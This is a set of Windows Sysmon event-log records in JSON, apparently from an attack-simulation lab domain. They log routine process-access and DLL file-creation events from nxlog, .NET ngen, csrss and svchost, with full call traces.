{"EventTime":"2020-08-01 07:00:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7377,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:52.621\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3580\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:52.621","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3580","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:00:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":7378,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 07:00:52.699\r\nProcessGuid: {E2A3D6B1-1324-5F25-0000-0010CA140B00}\r\nProcessId: 4840\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\12e8-0\\Microsoft.GroupPolicy.Commands.dll\r\nCreationUtcTime: 2020-08-01 07:00:52.699","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 07:00:52.699","ProcessGuid":"{E2A3D6B1-1324-5F25-0000-0010CA140B00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\12e8-0\\Microsoft.GroupPolicy.Commands.dll","CreationUtcTime":"2020-08-01 07:00:52.699","EventReceivedTime":"2020-08-01 07:00:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7379,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:52.715\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4456\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1324-5F25-0000-0010DA180B00}\r\nTargetProcessId: 4584\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:52.715","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4456","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1324-5F25-0000-0010DA180B00}","TargetProcessId":"4584","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:00:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7380,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:52.715\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 804\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1324-5F25-0000-0010DA180B00}\r\nTargetProcessId: 4584\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:52.715","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"804","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1324-5F25-0000-0010DA180B00}","TargetProcessId":"4584","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:00:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7381,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:52.715\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1324-5F25-0000-0010DA180B00}\r\nTargetProcessId: 4584\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:52.715","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1324-5F25-0000-0010DA180B00}","TargetProcessId":"4584","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:00:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":7382,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 07:00:52.902\r\nProcessGuid: {E2A3D6B1-1324-5F25-0000-0010DA180B00}\r\nProcessId: 4584\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\11e8-0\\Microsoft.GroupPolicy.Commands.dll\r\nCreationUtcTime: 2020-08-01 07:00:52.902","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 07:00:52.902","ProcessGuid":"{E2A3D6B1-1324-5F25-0000-0010DA180B00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\11e8-0\\Microsoft.GroupPolicy.Commands.dll","CreationUtcTime":"2020-08-01 07:00:52.902","EventReceivedTime":"2020-08-01 07:00:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7383,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:52.902\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1324-5F25-0000-0010AC1C0B00}\r\nTargetProcessId: 4180\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:52.902","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1324-5F25-0000-0010AC1C0B00}","TargetProcessId":"4180","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:00:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7384,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:52.902\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 1212\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1324-5F25-0000-0010AC1C0B00}\r\nTargetProcessId: 4180\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:52.902","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"1212","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1324-5F25-0000-0010AC1C0B00}","TargetProcessId":"4180","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:00:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7385,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:52.918\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1324-5F25-0000-0010AC1C0B00}\r\nTargetProcessId: 4180\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:52.918","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1324-5F25-0000-0010AC1C0B00}","TargetProcessId":"4180","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:00:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
